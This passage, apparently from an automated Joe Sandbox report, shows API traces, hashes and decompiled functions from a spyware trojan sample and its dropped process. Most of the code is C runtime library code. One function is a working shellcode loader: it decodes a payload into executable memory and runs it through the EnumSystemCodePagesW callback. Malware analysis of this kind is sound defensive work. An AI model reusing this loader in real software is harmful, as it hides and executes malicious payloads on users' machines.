lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,80000000,00000003), ref: 00405F8F
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,80000000,00000003), ref: 00405F9F

Strings

C:\Users\user\Desktop, xrefs: 00405F89

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction ID: 7456b8531bb3b8a4d8e8c00392aaf18f99b4ab5ae19bc30171d9ddc8328a16ac
Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction Fuzzy Hash: B1D05EB2411D219ED3126704DD0099F77A8EF5230174A4426E841E71A0D77C5C918AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004060C3 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060C3(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x004060d3
0x004060d5
0x004060d8
0x00406104
0x004060dd
0x004060e6
0x004060eb
0x004060f6
0x004060f9
0x00406115
0x004060fb
0x00406102
0x00000000
0x00406102
0x0040610e
0x00406112
0x00406112
0x0040610c
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060EB
CharNextA.USER32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FC
lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction ID: ebd02a31c913037c7252cee765efb5e80e8868db32339617edb9e16a90b2d78f
Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction Fuzzy Hash: 7CF0F631100054FFDB02DFA5CD40D9EBBA8DF46350B2640BAE841FB311D674DE11ABA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: miylwnpd.exePID: 3908, Parent PID: 5944COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.4%
Total number of Nodes:	1644
Total number of Limit Nodes:	98

Executed Functions

Function 002E12BA Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E002E12BA(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E002E1530(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E002E2752(_t98, _t119, _t119); // executed
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E002E1530(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E002E1CC3())) = 0x22;
												L4:
												E002E1E89();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E002E2873(_t119)); // executed
											_t88 = E002E2A2A(); // executed
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E002E2897(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E002E1CC3())) = 0x16;
				goto L4;
			}

0x002e12c4
0x002e12c7
0x002e12cd
0x002e12d0
0x002e12d3
0x002e12f0
0x00000000
0x002e12f0
0x002e12d5
0x002e12da
0x00000000
0x00000000
0x002e12de
0x002e12f9
0x002e12fc
0x002e12fe
0x002e130c
0x002e130c
0x002e1310
0x002e1318
0x002e131d
0x002e131d
0x002e1320
0x002e1322
0x00000000
0x002e1324
0x002e1324
0x002e132c
0x002e132e
0x00000000
0x00000000
0x002e1330
0x002e1333
0x002e1336
0x002e133d
0x002e133f
0x002e1346
0x002e1341
0x002e1341
0x002e1341
0x002e134b
0x002e134e
0x002e1350
0x002e1439
0x00000000
0x002e1356
0x002e1356
0x002e1356
0x002e135d
0x002e139e
0x002e139e
0x002e13a0
0x002e140b
0x002e1411
0x002e1414
0x002e146b
0x00000000
0x002e1471
0x002e1416
0x002e1419
0x002e141b
0x002e1441
0x002e1441
0x002e1445
0x002e144f
0x002e1454
0x002e145c
0x002e12eb
0x002e12eb
0x00000000
0x002e12eb
0x002e141d
0x002e1420
0x002e1423
0x002e1424
0x002e1427
0x002e1427
0x002e1428
0x002e142b
0x002e142e
0x00000000
0x002e142e
0x002e13a2
0x002e13a4
0x002e13c8
0x002e13cd
0x002e13d3
0x002e13d5
0x002e13d5
0x002e13a6
0x002e13a8
0x002e13ae
0x002e13c0
0x002e13c0
0x002e13c0
0x002e13c2
0x002e13b0
0x002e13b5
0x002e13b7
0x002e13b7
0x002e13c4
0x002e13c4
0x002e13d7
0x002e13da
0x00000000
0x002e13dc
0x002e13dc
0x002e13dd
0x002e13e7
0x002e13e8
0x002e13ed
0x002e13f0
0x002e13f2
0x002e1479
0x00000000
0x002e1479
0x002e13f8
0x002e13fb
0x002e1467
0x002e1467
0x002e1467
0x002e1467
0x00000000
0x002e1467
0x002e13fd
0x002e13fd
0x002e13ff
0x002e13ff
0x002e1402
0x002e1405
0x00000000
0x002e1405
0x002e13da
0x002e135f
0x002e1362
0x002e1365
0x002e1367
0x00000000
0x00000000
0x002e1369
0x00000000
0x00000000
0x002e136f
0x002e1371
0x002e1373
0x002e1375
0x002e1375
0x002e1378
0x002e137b
0x002e137d
0x00000000
0x002e1383
0x002e138a
0x002e138f
0x002e1392
0x002e1395
0x002e1398
0x002e139a
0x00000000
0x002e139a
0x002e1431
0x002e1431
0x002e1431
0x00000000
0x002e1356
0x002e1350
0x002e1322
0x002e1305
0x002e1308
0x002e130a
0x00000000
0x00000000
0x00000000
0x002e130a
0x002e12e0
0x002e12e5
0x00000000

APIs

_memset.LIBCMT ref: 002E1318
_memcpy_s.LIBCMT ref: 002E138A
__read_nolock.LIBCMT ref: 002E13E8
__filbuf.LIBCMT ref: 002E140B
_memset.LIBCMT ref: 002E144F

Part of subcall function 002E1CC3: __getptd_noexit.LIBCMT ref: 002E1CC3

Memory Dump Source

Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: aa268b528c11a433dd5262b514e00719fd6780e13aa98440949dae7bf610eace
Instruction ID: e26872198e3d514d38b03515717230892349f2ed21cd7ceda9da50dc776bd851
Opcode Fuzzy Hash: aa268b528c11a433dd5262b514e00719fd6780e13aa98440949dae7bf610eace
Instruction Fuzzy Hash: 9E51B370A60786DBDB248FAB88806AE77B5AF41320FA48779F835966D0D7709D708B41

Uniqueness

Uniqueness Score: -1.00%

Function 002E1000 Relevance: 7.6, APIs: 5, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E002E1000(void* __ecx, void* __eflags, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				intOrPtr _t6;
				void* _t7;
				_Unknown_base(*)()* _t8;
				void* _t19;
				_Unknown_base(*)()* _t20;
				void* _t25;
				void* _t26;
				void* _t27;
				intOrPtr* _t33;

				_push(_t19);
				_t27 = 0; // executed
				_t6 = E002E1149(_t19, _t25, 0, 0x17d78400); // executed
				 *_t33 = 0x2f3000;
				_v8 = _t6;
				_t7 = E002E11DB(_a12, _t26); // executed
				_t8 = VirtualAlloc(0, 0x1433, 0x3000, 0x40); // executed
				_t20 = _t8;
				E002E147F(_t20, 0x1433, 1, _t7); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					E002E1530(_t10, 0xcb, 0x17d78400);
					do {
						 *(_t20 + _t27) = ( *(_t20 + _t27) - 0x00000009 ^ 0x0000000f) + 0x00000047 ^ 0x00000052;
						_t27 = _t27 + 1;
					} while (_t27 < 0x1433);
					EnumSystemCodePagesW(_t20, 0); // executed
				}
				return 0;
			}

0x002e1004
0x002e100c
0x002e100e
0x002e1013
0x002e101d
0x002e1020
0x002e1036
0x002e1044
0x002e1048
0x002e104d
0x002e1055
0x002e1062
0x002e106a
0x002e1075
0x002e1078
0x002e1079
0x002e1080
0x002e1080
0x002e108c

APIs

_malloc.LIBCMT ref: 002E100E

Part of subcall function 002E1149: __FF_MSGBANNER.LIBCMT ref: 002E1160
Part of subcall function 002E1149: __NMSG_WRITE.LIBCMT ref: 002E1167
Part of subcall function 002E1149: RtlAllocateHeap.NTDLL(01190000,00000000,00000001,00000000,00000000,00000000,?,002E48C7,00000000,00000000,00000000,00000000,?,002E44F9,00000018,002F2280), ref: 002E118C

Part of subcall function 002E11DB: __wfsopen.LIBCMT ref: 002E11E6

VirtualAlloc.KERNELBASE(00000000,00001433,00003000,00000040), ref: 002E1036
__fread_nolock.LIBCMT ref: 002E1048
_memset.LIBCMT ref: 002E1062
EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 002E1080

Memory Dump Source

Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd

Similarity

API ID: AllocAllocateCodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
String ID:
API String ID: 3693343133-0
Opcode ID: 96e153beab87a24f54424d94654743333a4d56c1256286406c14aa18ff270ba3
Instruction ID: 4ff94ce60b984f4ad6106b9fadbc16e8ad067f74f9ba87d34f0f188faa901364
Opcode Fuzzy Hash: 96e153beab87a24f54424d94654743333a4d56c1256286406c14aa18ff270ba3
Instruction Fuzzy Hash: 2F0147B19803847BEB202B72EC4BF9B3B5CEF41B94F500431FA056E182E5B499214674

Uniqueness

Uniqueness Score: -1.00%

Function 002E149A Relevance: 3.0, APIs: 2, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E002E149A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t29;
				void* _t32;

				_push(0xc);
				_push(0x2f2170);
				E002E2400(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
					L6:
					_t16 = 0;
				} else {
					_t31 =  *((intOrPtr*)(_t32 + 0x18));
					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
						E002E1F5E(_t31);
						 *((intOrPtr*)(_t32 - 4)) = 0;
						_t19 = E002E12BA( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
						_t29 = _t19;
						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
						E002E1523(_t31);
						_t16 = _t29;
					} else {
						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
							E002E1530( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
						}
						 *((intOrPtr*)(E002E1CC3())) = 0x16;
						E002E1E89();
						goto L6;
					}
				}
				return E002E2445(_t16);
			}

0x002e149a
0x002e149c
0x002e14a1
0x002e14a8
0x002e14ae
0x002e14e1
0x002e14e1
0x002e14b5
0x002e14b5
0x002e14ba
0x002e14ea
0x002e14f0
0x002e1500
0x002e1508
0x002e150a
0x002e150d
0x002e1514
0x002e1519
0x002e14bc
0x002e14c0
0x002e14c9
0x002e14ce
0x002e14d6
0x002e14dc
0x00000000
0x002e14dc
0x002e14ba
0x002e14e8

APIs

_memset.LIBCMT ref: 002E14C9
__lock_file.LIBCMT ref: 002E14EA

Memory Dump Source

Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 389725d124659a5c446920306a3d73af076f4c7cee87b78890af434afa630387
Instruction ID: b6305ad2d264ca9925124acf093c41405541b0a18e2081c357435bdba9022bf3
Opcode Fuzzy Hash: 389725d124659a5c446920306a3d73af076f4c7cee87b78890af434afa630387
Instruction Fuzzy Hash: 0701D8718A0289EBCF21AFA78C0189F7B71AF80320F944235F8145A291D7718931DF91

Uniqueness

Uniqueness Score: -1.00%

Function 002E11DB Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E002E11DB(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E002E11F0(_t4, _t5, _t6, _t9); // executed
				return _t3;
			}

0x002e11de
0x002e11e0
0x002e11e3
0x002e11e6
0x002e11ef

APIs

__wfsopen.LIBCMT ref: 002E11E6

Memory Dump Source

Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 67015401e565584d9e83b7bf132406915468a93eb44a1a41c4941c6b4f8afc28
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 95B0927648020C77CE022A83EC02A493B1A9B446A4F408020FB0C1C172A673A6709A89

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002E43CC Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E002E43CC(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x002e43d1
0x002e43e1

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,002E1E2A,?,?,?,00000000), ref: 002E43D1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 002E43DA

Memory Dump Source

Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6a05d7d6a3c01da6cbd7041c24a232f8b4b8cd030e08d788cd620a9c2c13fbf4
Instruction ID: 22636e435f70cd50a7e578115a069309c64d3aa025561e64cc07c78459df3501
Opcode Fuzzy Hash: 6a05d7d6a3c01da6cbd7041c24a232f8b4b8cd030e08d788cd620a9c2c13fbf4
Instruction Fuzzy Hash: A8B09235084248ABCF002B91FC8DB483F29EB14652F010410F60D5C0608B725C908A92

Uniqueness

Uniqueness Score: -1.00%

Function 002E439B Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E002E439B(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}

0x002e43a8

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,002E3447,002E33FC), ref: 002E43A1

Memory Dump Source

Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 06195edd405ba63af909aef867d45964980a6877ec7b6c94886de2f2bd17c0df
Instruction ID: 8bb35203cfc8987501359737a244ab4b46cccdfdba539e1a7c0e7039825e497c
Opcode Fuzzy Hash: 06195edd405ba63af909aef867d45964980a6877ec7b6c94886de2f2bd17c0df
Instruction Fuzzy Hash: B6A0223008020CFBCF002F82FC8C8883F2CEB002A0B000020F80C0C030CB33ACA08AC2

Uniqueness

Uniqueness Score: -1.00%

Function 002E38A8 Relevance: 12.2, APIs: 8, Instructions: 229
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E002E38A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				intOrPtr _t129;
				signed int _t133;
				void* _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0x2f2260);
				E002E2400(__ebx, __edi, __esi);
				E002E442F(0xb);
				 *((intOrPtr*)(_t155 - 4)) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E002E4869();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0x2f4848 = _t82;
					 *0x2f50e4 = _t141;
					while(1) {
						__eflags = _t133 - 0x800 + _t82;
						if(_t133 >= 0x800 + _t82) {
							break;
						}
						 *((short*)(_t133 + 4)) = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						 *((intOrPtr*)(_t133 + 8)) = 0;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
						 *((short*)(_t133 + 0x25)) = 0xa0a;
						 *((intOrPtr*)(_t133 + 0x38)) = 0;
						 *((char*)(_t133 + 0x34)) = 0;
						_t133 = _t133 + 0x40;
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0x2f4848; // 0x11b14b8
					}
					GetStartupInfoW(_t155 - 0x74);
					__eflags =  *((short*)(_t155 - 0x42));
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						__eflags = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							__eflags = _t142 - 3;
							if(_t142 >= 3) {
								break;
							}
							_t147 = (_t142 << 6) +  *0x2f4848;
							 *(_t155 - 0x24) = _t147;
							__eflags =  *_t147 - 0xffffffff;
							if( *_t147 == 0xffffffff) {
								L33:
								 *(_t147 + 4) = 0x81;
								__eflags = _t142;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
									__eflags = _t90;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
